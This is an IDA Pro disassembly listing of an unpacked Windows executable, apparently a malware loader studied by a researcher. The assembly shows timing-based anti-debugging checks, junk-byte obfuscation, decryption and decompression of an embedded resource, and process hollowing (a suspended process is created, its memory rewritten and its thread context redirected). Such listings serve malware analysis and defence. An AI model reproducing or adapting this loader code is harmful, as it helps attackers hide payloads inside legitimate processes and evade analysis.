;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 13C0BCA0543F9E460FA02E4C41452237
; File Name : u:\work\13c0bca0543f9e460fa02e4c41452237_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 00000BB6 ( 2998.)
; Section size in file : 00000BB6 ( 2998.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 10001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; [000000CC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
add [eax], eax
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
or [ebx+12042444h], al
add dword ptr [esp], 0Ah
retn
; ---------------------------------------------------------------------------
db 98h
dd 52C0C10Fh, 195E85Ah, 2AD00000h, 0CCB03D20h, 310FECC3h
dd 310FC88Bh, 0D1F7C82Bh, 5000F981h, 57C0000h, 48AC67E9h
dd 1E840h, 0E82A0000h, 1, 24448308h, 4831204h, 0C0C30A24h
dd 0F6E9C08Bh, 0B6000000h, 0DA3D2061h, 5034B4CCh, 33310F52h
dd 0C8335AC8h, 0E8C08A58h, 0FFFFFF3Bh, 3D206D7Bh, 8E8580CDh
dd 0C88B310Fh, 0C82B310Fh, 0F981D1F7h, 5000h, 5FE9057Ch
dd 0EB60B80Ch, 0ACFC0B04h, 4C48320h, 0FEA8840Fh, 850FFFFFh
dd 0FFFFFEA2h, 720BEB0Ah, 73696765h, 65726574h, 1EB0064h
dd 0F5A52B1h, 0FC88B31h, 0F7C82B31h, 0F981D1h, 7F000050h
dd 0F5250FEh, 5AC83331h, 0EB58C833h, 8B68E202h, 0FF9AE8C0h
dd 40ABFFFFh, 61D3D20h, 310F2559h, 310FC88Bh, 0D1F7C82Bh
dd 5000F981h, 0FE7F0000h, 0CF0FCF0Fh, 0C3830FF8h, 0
; ---------------------------------------------------------------------------
push edx
faddp st(6), st
clc
add eax, 310F5250h
xor ecx, eax
pop edx
xor ecx, eax
pop eax
jmp short loc_100011E3
; ---------------------------------------------------------------------------
scasd
dec esp
loc_100011E3: ; CODE XREF: .text:100011DF�j
push eax
pop eax
jmp short loc_100011EB
; ---------------------------------------------------------------------------
push ss
clc
inc eax
inc eax
loc_100011EB: ; CODE XREF: .text:100011E5�j
jmp short loc_100011EF
; ---------------------------------------------------------------------------
db 60h, 80h
; ---------------------------------------------------------------------------
loc_100011EF: ; CODE XREF: .text:loc_100011EB�j
; .text:10001205�j
push 5C43h
add esp, 4
push eax
pop eax
jp near ptr dword_1000100C+46h
jnp near ptr dword_1000100C+46h
jg short near ptr loc_100011EF+3
add al, 75h
add al, 0CCh
sub al, 0E9h
; ---------------------------------------------------------------------------
db 0DDh, 0FEh, 0FFh
; ---------------------------------------------------------------------------
jmp dword ptr [eax+58h]
; ---------------------------------------------------------------------------
db 20h
dd 0CB88A03Dh, 8B310FFEh, 2B310FC8h, 81D1F7C8h, 5000F9h
dd 68FE7F00h, 0A43Dh, 0F904C483h, 0FE76820Fh, 9200FFFFh
dd 0C2D3389Eh, 1E8h, 1E8AE00h, 0D8000000h, 4244483h, 24048312h
dd 0F60C30Ah, 0FC88B31h, 0F7C82B31h, 0F981D1h, 7C000050h
dd 7C6BE905h, 8C0FA86Ch, 0FFFFFEFDh, 0FEF78D0Fh, 0EB68FFFFh
dd 0A060B804h, 0C483F8E0h, 0B5880F04h, 0FFFFFFFh, 0FFFFAF89h
dd 68E87FFFh, 0FF000000h, 372C35h, 1EDE810h, 6A0000h, 42FE8h
db 0
; =============== S U B R O U T I N E =======================================
sub_100012A9 proc near ; CODE XREF: start�p
call sub_100016F0 ; GetTickCount
mov dword_10003774, eax
push 64h
call sub_1000171A ; Sleep
call sub_100016F0 ; GetTickCount
mov dword_10003778, eax
push 64h
call sub_1000171A ; Sleep
call sub_100016F0 ; GetTickCount
mov dword_1000377C, eax
mov eax, dword_10003774
mov ebx, dword_10003778
sub ebx, eax
mov ecx, dword_1000377C
sub ecx, eax
cmp ebx, 64h
jnb short locret_100012FE
cmp ecx, 0C8h
jnb short locret_100012FE
push 0
call sub_100016D8 ; ExitProcess
locret_100012FE: ; CODE XREF: sub_100012A9+44�j
; sub_100012A9+4C�j
retn
sub_100012A9 endp
; ---------------------------------------------------------------------------
push 0Ah
push 7
push 0
call sub_100016DE ; FindResourceA
mov dword_10003720, eax
push eax
push 0
call sub_100016F6 ; LoadResource
mov dword_10003724, eax
push dword_10003720
push 0
call sub_10001714 ; SizeofResource
mov dword_10003730, eax
push dword_10003724
call sub_100016FC ; LockResource
mov dword_10003728, eax
mov ecx, dword_10003730
mov edi, dword_10003728
jmp short loc_10001355
; ---------------------------------------------------------------------------
loc_1000134C: ; CODE XREF: .text:10001357�j
dec ecx
rol byte ptr [ecx+edi], 80h
xor byte ptr [ecx+edi], 1Ch
loc_10001355: ; CODE XREF: .text:1000134A�j
or ecx, ecx
jnz short loc_1000134C
push dword_10003728
call sub_10001740
add esp, 4
mov dword_10003734, eax
push 4
push 1000h
push dword_10003734
push 0
call sub_10001720 ; VirtualAlloc
mov dword_1000372C, eax
push dword_10003734
push dword_1000372C
push dword_10003730
push dword_10003728
call sub_10001770
add esp, 10h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100013A6 proc near ; CODE XREF: .text:10001538�p
; .text:1000159A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
mov eax, [ebp+arg_0]
div [ebp+arg_4]
or edx, edx
jnz short loc_100013BA
mov eax, [ebp+arg_0]
jmp short locret_100013C9
; ---------------------------------------------------------------------------
loc_100013BA: ; CODE XREF: sub_100013A6+D�j
mov edx, 0
mov eax, [ebp+arg_0]
div [ebp+arg_4]
inc eax
mul [ebp+arg_4]
locret_100013C9: ; CODE XREF: sub_100013A6+12�j
leave
retn 8
sub_100013A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100013CD proc near ; CODE XREF: .text:100014A1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
add esi, [esi+3Ch]
mov dword_10003738, esi
mov eax, [esi+38h]
mov dword_1000373C, eax
movzx eax, word ptr [esi+6]
mov dword_10003740, eax
movzx ecx, word ptr [esi+14h]
add ecx, 18h
add esi, ecx
mov dword_10003744, esi
mov esi, dword_10003738
xor edx, edx
mov eax, [esi+54h]
div dword_1000373C
or edx, edx
jnz short loc_1000141B
mov eax, [esi+54h]
mov dword_10003770, eax
jmp short loc_10001433
; ---------------------------------------------------------------------------
loc_1000141B: ; CODE XREF: sub_100013CD+42�j
xor edx, edx
mov eax, [esi+54h]
div dword_1000373C
inc eax
mul dword_1000373C
add dword_10003770, eax
loc_10001433: ; CODE XREF: sub_100013CD+4C�j
mov ecx, 0
mov edi, dword_10003744
loc_1000143E: ; CODE XREF: sub_100013CD+B7�j
cmp ecx, dword_10003740
jz short loc_10001486
push ecx
cmp dword ptr [edi+8], 0
jz short loc_1000147F
xor edx, edx
mov eax, [edi+8]
div dword_1000373C
or edx, edx
jnz short loc_10001467
mov eax, [edi+8]
add dword_10003770, eax
jmp short loc_1000147F
; ---------------------------------------------------------------------------
loc_10001467: ; CODE XREF: sub_100013CD+8D�j
xor edx, edx
mov eax, [edi+8]
div dword_1000373C
inc eax
mul dword_1000373C
add dword_10003770, eax
loc_1000147F: ; CODE XREF: sub_100013CD+7E�j
; sub_100013CD+98�j
pop ecx
inc ecx
add edi, 28h
jmp short loc_1000143E
; ---------------------------------------------------------------------------
loc_10001486: ; CODE XREF: sub_100013CD+77�j
mov eax, dword_10003770
leave
retn 4
sub_100013CD endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov esi, [ebp+8]
add esi, [esi+3Ch]
mov dword_10003748, esi
push dword ptr [ebp+8]
call sub_100013CD
mov dword_10003754, eax
push 4
push 1000h
push dword_10003754
push 0
call sub_10001720 ; VirtualAlloc
mov dword_10003758, eax
mov eax, dword_10003758
mov dword_1000375C, eax
mov esi, dword_10003748
mov eax, [esi+54h]
mov dword_10003760, eax
movzx ecx, word ptr [esi+14h]
add ecx, 18h
add esi, ecx
mov dword_10003764, esi
mov esi, dword_10003744
mov edi, dword_10003738
mov ecx, 0
mov ebx, dword_10003760
loc_10001502: ; CODE XREF: .text:1000151B�j
cmp ecx, dword_10003740
jz short loc_1000151D
cmp [esi+14h], ebx
jnb short loc_10001517
mov eax, [esi+14h]
mov dword_10003760, eax
loc_10001517: ; CODE XREF: .text:1000150D�j
inc ecx
add esi, 28h
jmp short loc_10001502
; ---------------------------------------------------------------------------
loc_1000151D: ; CODE XREF: .text:10001508�j
push edi
mov edi, dword_1000375C
mov esi, [ebp+8]
mov ecx, dword_10003760
rep movsb
pop edi
mov eax, [edi+54h]
mov ebx, [edi+38h]
push ebx
push eax
call sub_100013A6
add dword_1000375C, eax
mov ecx, 0
mov esi, dword_10003744
mov edi, dword_10003738
loc_10001554: ; CODE XREF: .text:100015C5�j
cmp ecx, dword_10003740
jz short loc_100015C7
push ecx
cmp dword ptr [esi+10h], 0
jbe short loc_100015A7
mov eax, [esi+10h]
mov dword_10003768, eax
cmp eax, [esi+8]
jbe short loc_10001578
mov eax, [esi+8]
mov dword_10003768, eax
loc_10001578: ; CODE XREF: .text:1000156E�j
mov eax, [esi+14h]
add eax, [ebp+8]
push edi
push esi
mov edi, dword_1000375C
mov esi, eax
mov ecx, dword_10003768
rep movsb
pop esi
pop edi
mov eax, [esi+8]
mov ebx, [edi+38h]
push ebx
push eax
call sub_100013A6
add dword_1000375C, eax
jmp short loc_100015C0
; ---------------------------------------------------------------------------
loc_100015A7: ; CODE XREF: .text:10001561�j
cmp dword ptr [esi+8], 0
jz short loc_100015C0
mov eax, [esi+8]
mov ebx, [edi+38h]
push ebx
push eax
call sub_100013A6
add dword_1000375C, eax
loc_100015C0: ; CODE XREF: .text:100015A5�j
; .text:100015AB�j
pop ecx
inc ecx
add esi, 28h
jmp short loc_10001554
; ---------------------------------------------------------------------------
loc_100015C7: ; CODE XREF: .text:1000155A�j
push 78h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call sub_100016E4 ; GetModuleFileNameA
push offset dword_10003044
push offset dword_10003000
push 0
push 0
push 4
push 0
push 0
push 0
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call sub_100016D2 ; CreateProcessA
mov dword_10003054, 10007h
push offset dword_10003054
push dword_10003048
call sub_100016EA ; GetThreadContext
mov ebx, dword_100030F8
add ebx, 8
push 0
push 4
push offset dword_1000376C
push ebx
push dword_10003044
call sub_10001702 ; ReadProcessMemory
push 40h
push 3000h
push dword_10003754
push dword ptr [edi+34h]
push dword_10003044
call sub_10001726 ; VirtualAllocEx
push 0
push dword_10003754
push dword_10003758
push dword ptr [edi+34h]
push dword_10003044
call sub_10001732 ; WriteProcessMemory
mov ebx, dword_100030F8
add ebx, 8
push 0
push 4
lea eax, [edi+34h]
push eax
push ebx
push dword_10003044
call sub_10001732 ; WriteProcessMemory
mov eax, [edi+34h]
add eax, [edi+28h]
mov dword_10003104, eax
push offset dword_10003054
push dword_10003048
call sub_1000170E ; SetThreadContext
push dword_10003048
call sub_10001708 ; ResumeThread
push 8000h
push 0
push dword_1000372C
call sub_1000172C ; VirtualFree
push 8000h
push 0
push dword_10003758
call sub_1000172C ; VirtualFree
leave
retn 4
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016D2 proc near ; CODE XREF: .text:100015F2�p
jmp ds:dword_10002000
sub_100016D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016D8 proc near ; CODE XREF: sub_100012A9+50�p
jmp ds:dword_10002004
sub_100016D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016DE proc near ; CODE XREF: .text:10001305�p
jmp ds:dword_10002008
sub_100016DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016E4 proc near ; CODE XREF: .text:100015D0�p
jmp ds:dword_1000200C
sub_100016E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016EA proc near ; CODE XREF: .text:1000160C�p
jmp ds:dword_10002010
sub_100016EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016F0 proc near ; CODE XREF: sub_100012A9�p
; sub_100012A9+11�p ...
jmp ds:dword_10002014
sub_100016F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016F6 proc near ; CODE XREF: .text:10001312�p
jmp ds:dword_10002018
sub_100016F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100016FC proc near ; CODE XREF: .text:10001334�p
jmp ds:dword_1000201C
sub_100016FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001702 proc near ; CODE XREF: .text:1000162A�p
jmp ds:dword_10002020
sub_10001702 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001708 proc near ; CODE XREF: .text:100016A4�p
jmp ds:dword_10002024
sub_10001708 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000170E proc near ; CODE XREF: .text:10001699�p
jmp ds:dword_10002028
sub_1000170E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001714 proc near ; CODE XREF: .text:10001324�p
jmp ds:dword_1000202C
sub_10001714 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000171A proc near ; CODE XREF: sub_100012A9+C�p
; sub_100012A9+1D�p
jmp ds:dword_10002030
sub_1000171A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001720 proc near ; CODE XREF: .text:1000137B�p
; .text:100014BA�p
jmp ds:dword_10002034
sub_10001720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001726 proc near ; CODE XREF: .text:10001645�p
jmp ds:dword_10002038
sub_10001726 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000172C proc near ; CODE XREF: .text:100016B6�p
; .text:100016C8�p
jmp ds:dword_1000203C
sub_1000172C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001732 proc near ; CODE XREF: .text:10001661�p
; .text:1000167E�p
jmp ds:dword_10002040
sub_10001732 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001740 proc near ; CODE XREF: .text:1000135F�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
pusha
mov esi, [esp+20h+arg_0]
mov ebx, [esi]
or eax, 0FFFFFFFFh
cmp ebx, 32335041h
jnz short loc_1000175D
mov ebx, [esi+4]
cmp ebx, 18h
jb short loc_1000175D
mov eax, [esi+10h]
loc_1000175D: ; CODE XREF: sub_10001740+10�j
; sub_10001740+18�j
mov [esp+20h+var_4], eax
popa
retn
sub_10001740 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001770 proc near ; CODE XREF: .text:1000139D�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
pusha
mov esi, [esp+20h+arg_0]
mov ecx, [esp+20h+arg_4]
mov edi, [esp+20h+arg_8]
test esi, esi
jz short loc_100017E7
test edi, edi
jz short loc_100017E7
cmp ecx, 18h
jb short loc_100017E7
mov ebx, [esi]
cmp ebx, 32335041h
jnz short loc_100017E7
mov ebx, [esi+4]
cmp ebx, 18h
jb short loc_100017E7
sub ecx, ebx
jb short loc_100017E7
cmp [esi+8], ecx
ja short loc_100017E7
add ebx, esi
push dword ptr [esi+8]
push ebx
call sub_10001AD0
add esp, 8
cmp eax, [esi+0Ch]
jnz short loc_100017E7
mov ecx, [esp+20h+arg_C]
cmp [esi+10h], ecx
ja short loc_100017E7
push ecx
push edi
push dword ptr [esi+8]
push ebx
call sub_100017F0
add esp, 10h
cmp eax, [esi+10h]
jnz short loc_100017E7
mov ebx, eax
push eax
push edi
call sub_10001AD0
add esp, 8
cmp eax, [esi+14h]
mov eax, ebx
jz short loc_100017EA
loc_100017E7: ; CODE XREF: sub_10001770+F�j
; sub_10001770+13�j ...
or eax, 0FFFFFFFFh
loc_100017EA: ; CODE XREF: sub_10001770+75�j
mov [esp+20h+var_4], eax
popa
retn
sub_10001770 endp
; =============== S U B R O U T I N E =======================================
sub_100017F0 proc near ; CODE XREF: sub_10001770+57�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
pusha
mov esi, [esp+20h+arg_0]
mov eax, [esp+20h+arg_4]
mov edi, [esp+20h+arg_8]
mov ecx, [esp+20h+arg_C]
push eax
push ecx
test esi, esi
jz loc_10001AB6
test edi, edi
jz loc_10001AB6
cld
xor edx, edx
loc_10001816: ; CODE XREF: sub_100017F0:loc_10001850�j
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov al, [esi]
add esi, 1
sub [esp+28h+var_28], 1
jb loc_10001AB6
mov [edi], al
add edi, 1
mov ebx, 2
loc_1000183A: ; CODE XREF: sub_100017F0+129�j
; sub_100017F0+1D4�j ...
add dl, dl
jnz short loc_10001850
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001850: ; CODE XREF: sub_100017F0+4C�j
jnb short loc_10001816
add dl, dl
jnz short loc_10001868
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001868: ; CODE XREF: sub_100017F0+64�j
jnb loc_1000191E
xor eax, eax
add dl, dl
jnz short loc_10001886
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001886: ; CODE XREF: sub_100017F0+82�j
jnb loc_10001A6B
add dl, dl
jnz short loc_100018A2
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100018A2: ; CODE XREF: sub_100017F0+9E�j
adc eax, eax
add dl, dl
jnz short loc_100018BA
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100018BA: ; CODE XREF: sub_100017F0+B6�j
adc eax, eax
add dl, dl
jnz short loc_100018D2
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100018D2: ; CODE XREF: sub_100017F0+CE�j
adc eax, eax
add dl, dl
jnz short loc_100018EA
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100018EA: ; CODE XREF: sub_100017F0+E6�j
adc eax, eax
jz loc_10001907
mov ebx, [esp+28h+arg_C]
sub ebx, [esp+28h+var_28]
cmp eax, ebx
ja loc_10001AB6
mov ebx, edi
sub ebx, eax
mov al, [ebx]
loc_10001907: ; CODE XREF: sub_100017F0+FC�j
sub [esp+28h+var_28], 1
jb loc_10001AB6
mov [edi], al
inc edi
mov ebx, 2
jmp loc_1000183A
; ---------------------------------------------------------------------------
loc_1000191E: ; CODE XREF: sub_100017F0:loc_10001868�j
mov eax, 1
loc_10001923: ; CODE XREF: sub_100017F0:loc_10001957�j
add dl, dl
jnz short loc_10001939
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001939: ; CODE XREF: sub_100017F0+135�j
adc eax, eax
jb loc_10001AB6
add dl, dl
jnz short loc_10001957
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001957: ; CODE XREF: sub_100017F0+153�j
jb short loc_10001923
sub eax, ebx
mov ebx, 1
jnz loc_100019C9
mov ecx, 1
loc_1000196B: ; CODE XREF: sub_100017F0:loc_1000199F�j
add dl, dl
jnz short loc_10001981
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001981: ; CODE XREF: sub_100017F0+17D�j
adc ecx, ecx
jb loc_10001AB6
add dl, dl
jnz short loc_1000199F
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000199F: ; CODE XREF: sub_100017F0+19B�j
jb short loc_1000196B
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp ebp, ecx
pop ecx
ja loc_10001AB6
sub [esp+28h+var_28], ecx
jb loc_10001AB6
push esi
mov esi, edi
sub esi, ebp
rep movsb
pop esi
jmp loc_1000183A
; ---------------------------------------------------------------------------
loc_100019C9: ; CODE XREF: sub_100017F0+170�j
dec eax
test eax, 0FF000000h
jnz loc_10001AB6
shl eax, 8
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov al, [esi]
inc esi
mov ebp, eax
mov ecx, 1
loc_100019ED: ; CODE XREF: sub_100017F0:loc_10001A21�j
add dl, dl
jnz short loc_10001A03
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001A03: ; CODE XREF: sub_100017F0+1FF�j
adc ecx, ecx
jb loc_10001AB6
add dl, dl
jnz short loc_10001A21
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001A21: ; CODE XREF: sub_100017F0+21D�j
jb short loc_100019ED
cmp eax, 7D00h
sbb ecx, 0FFFFFFFFh
cmp eax, 500h
sbb ecx, 0FFFFFFFFh
cmp eax, 80h
adc ecx, 0
cmp eax, 80h
adc ecx, 0
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp eax, ecx
pop ecx
ja loc_10001AB6
sub [esp+28h+var_28], ecx
jb loc_10001AB6
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_1000183A
; ---------------------------------------------------------------------------
loc_10001A6B: ; CODE XREF: sub_100017F0:loc_10001886�j
sub [esp+28h+var_24], 1
jb loc_10001AB6
mov al, [esi]
inc esi
xor ecx, ecx
shr al, 1
jz loc_10001ABE
adc ecx, 2
mov ebp, eax
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp eax, ecx
pop ecx
ja loc_10001AB6
sub [esp+28h+var_28], ecx
jb loc_10001AB6
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
mov ebx, 1
jmp loc_1000183A
; ---------------------------------------------------------------------------
loc_10001AB6: ; CODE XREF: sub_100017F0+15�j
; sub_100017F0+1D�j ...
add esp, 8
popa
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_10001ABE: ; CODE XREF: sub_100017F0+28E�j
add esp, 8
sub edi, [esp+20h+arg_8]
mov [esp+20h+var_4], edi
popa
retn
sub_100017F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001AD0 proc near ; CODE XREF: sub_10001770+3B�p
; sub_10001770+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov esi, [esp+20h+arg_0]
mov ecx, [esp+20h+arg_4]
mov edi, offset dword_10003320
sub eax, eax
test esi, esi
jz loc_10001BB0
sub eax, 1
test ecx, ecx
jz loc_10001BAE
loc_10001AF3: ; CODE XREF: sub_10001AD0+3C�j
test esi, 3
jz short loc_10001B0E
xor al, [esi]
inc esi
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz short loc_10001AF3
loc_10001B0E: ; CODE XREF: sub_10001AD0+29�j
mov edx, ecx
and edx, 7
shr ecx, 3
jz loc_10001B95
loc_10001B1C: ; CODE XREF: sub_10001AD0+BF�j
xor eax, [esi]
add esi, 4
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
xor eax, [esi]
add esi, 4
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz loc_10001B1C
loc_10001B95: ; CODE XREF: sub_10001AD0+46�j
mov ecx, edx
test ecx, ecx
jz short loc_10001BAE
loc_10001B9B: ; CODE XREF: sub_10001AD0+DC�j
xor al, [esi]
inc esi
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz short loc_10001B9B
loc_10001BAE: ; CODE XREF: sub_10001AD0+1D�j
; sub_10001AD0+C9�j
not eax
loc_10001BB0: ; CODE XREF: sub_10001AD0+12�j
mov [esp+20h+var_4], eax
popa
retn
sub_10001AD0 endp
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000001E8 ( 488.)
; Section size in file : 000001E8 ( 488.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 10002000h
dword_10002000 dd 77E61BB8h ; DATA XREF: sub_100016D2�r
dword_10002004 dd 77E75CB5h ; DATA XREF: sub_100016D8�r
dword_10002008 dd 77E6CA8Ah ; DATA XREF: sub_100016DE�r
dword_1000200C dd 77E7A099h ; DATA XREF: sub_100016E4�r
dword_10002010 dd 77E97F16h ; DATA XREF: sub_100016EA�r
dword_10002014 dd 77E7751Ah ; DATA XREF: sub_100016F0�r
dword_10002018 dd 77E760B5h ; DATA XREF: sub_100016F6�r
dword_1000201C dd 77E7C931h ; DATA XREF: sub_100016FC�r
dword_10002020 dd 77E61A54h ; DATA XREF: sub_10001702�r
dword_10002024 dd 77E6E154h ; DATA XREF: sub_10001708�r
dword_10002028 dd 77EB9953h ; DATA XREF: sub_1000170E�r
dword_1000202C dd 77E7105Fh ; DATA XREF: sub_10001714�r
dword_10002030 dd 77E61BE6h ; DATA XREF: sub_1000171A�r
dword_10002034 dd 77E7980Ah ; DATA XREF: sub_10001720�r
dword_10002038 dd 77E79824h ; DATA XREF: sub_10001726�r
dword_1000203C dd 77E79E34h ; DATA XREF: sub_1000172C�r
dword_10002040 dd 77E61A90h ; DATA XREF: sub_10001732�r
align 8
dd 2070h, 2 dup(0)
dd 21DAh, 2000h, 5 dup(0)
dd 20B8h, 20CAh, 20D8h, 20E8h, 20FEh, 2112h, 2122h, 2132h
dd 2142h, 2156h, 2166h, 217Ah, 218Ch, 2194h, 21A4h, 21B6h
dd 21C4h, 0
db 40h ; @
align 2
aCreateprocessa db 'CreateProcessA',0
align 2
aA db '',0
aExitprocess db 'ExitProcess',0
aV db '',0
aFindresourcea db 'FindResourceA',0
db 7
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 14Ch
aGetthreadconte db 'GetThreadContext',0
align 2
dw 152h
aGettickcount db 'GetTickCount',0
align 2
dw 1A9h
aLoadresource db 'LoadResource',0
align 2
dw 1B7h
aLockresource db 'LockResource',0
align 2
dw 1FAh
aReadprocessmem db 'ReadProcessMemory',0
dw 207h
aResumethread db 'ResumeThread',0
align 2
dw 24Fh
aSetthreadconte db 'SetThreadContext',0
align 2
dw 25Fh
aSizeofresource db 'SizeofResource',0
align 4
db 60h ; `
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 81h ;
db 2, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 82h ;
db 2, 56h, 69h
aRtualallocex db 'rtualAllocEx',0
align 2
dw 283h
aVirtualfree db 'VirtualFree',0
db 0A7h ;
db 2, 57h, 72h
aIteprocessmemo db 'iteProcessMemory',0
align 2
aKernel32_dll db 'kernel32.dll',0
align 4
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 000007F8 ( 2040.)
; Section size in file : 000007F8 ( 2040.)
; Offset to raw data for section: 00003000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 10003000h
dword_10003000 dd 11h dup(0) ; DATA XREF: .text:100015DA�o
dword_10003044 dd 0 ; DATA XREF: .text:100015D5�o
; .text:10001624�r ...
dword_10003048 dd 0 ; DATA XREF: .text:10001606�r
; .text:10001693�r ...
dd 2 dup(0)
dword_10003054 dd 0 ; DATA XREF: .text:100015F7�w
; .text:10001601�o ...
dd 28h dup(0)
